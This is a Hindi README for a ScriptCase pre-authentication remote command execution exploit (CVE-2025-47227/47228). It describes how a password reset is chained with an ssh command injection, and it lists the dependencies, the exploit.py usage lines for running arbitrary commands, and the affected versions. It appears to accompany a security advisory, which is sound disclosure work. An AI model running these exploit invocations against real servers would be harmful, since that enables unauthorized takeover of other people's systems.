
ScriptCase पूर्व-प्रमाणीकृत रिमोट कमांड निष्पादन शोषण स्क्रिप्ट (CVE-2025-47227, CVE-2025-47228)।
प्रमाणीकरण-पूर्व रिमोट कमांड निष्पादन दो कमजोरियों को श्रृंखलित करके प्राप्त किया जाता है: पहली, कुछ शर्तों के तहत प्रोड कंसोल के एडमिनिस्ट्रेटर पासवर्ड को रीसेट करने की क्षमता है, और दूसरी, कनेक्शन सुविधाओं में एक साधारण प्रमाणित रिमोट कमांड निष्पादन है, जहाँ उपयोगकर्ता इनपुट को सीधे ssh सिस्टम कमांड में जोड़ दिया जाता है।
एक्सप्लॉइट्स द्वारा उपयोग की जाने वाली तृतीय-पक्ष Python निर्भरताओं को निम्नलिखित कमांडों में से किसी एक के साथ स्थापित किया जा सकता है:
# pip - universal
pip3 install Pillow pytesseract requests beautifulsoup4
# pacman - Arch Linux
pacman -S python-pillow python-pytesseract python-requests python-beautifulsoup4
कई परिदृश्यों को संभालने के लिए एक एक्सप्लॉइटेशन स्क्रिप्ट लिखी गई है:
Usage:
Examples:
Pre-Auth RCE (password reset + RCE)
python exploit.py -u http://example.org/scriptcase -c "command"
Password reset only (no auth)
python exploit.py -u http://example.org/scriptcase
RCE only (need account)
python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
Detect deployment path
python exploit.py -u http://example.org/ -d
Options:
-h, --help show this help message and exit
-u BASE_URL, --base-url=BASE_URL
-c COMMAND, --command=COMMAND
-p PASSWORD, --password=PASSWORD
-d, --detect
Production Environment मॉड्यूल का संस्करण 1.0.003-build-2 प्रभावित है। यह मॉड्यूल संस्करण ScriptCase संस्करण 9.12.006 (23) में शामिल है। पिछले संस्करणों के भी असुरक्षित होने की संभावना है।
https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution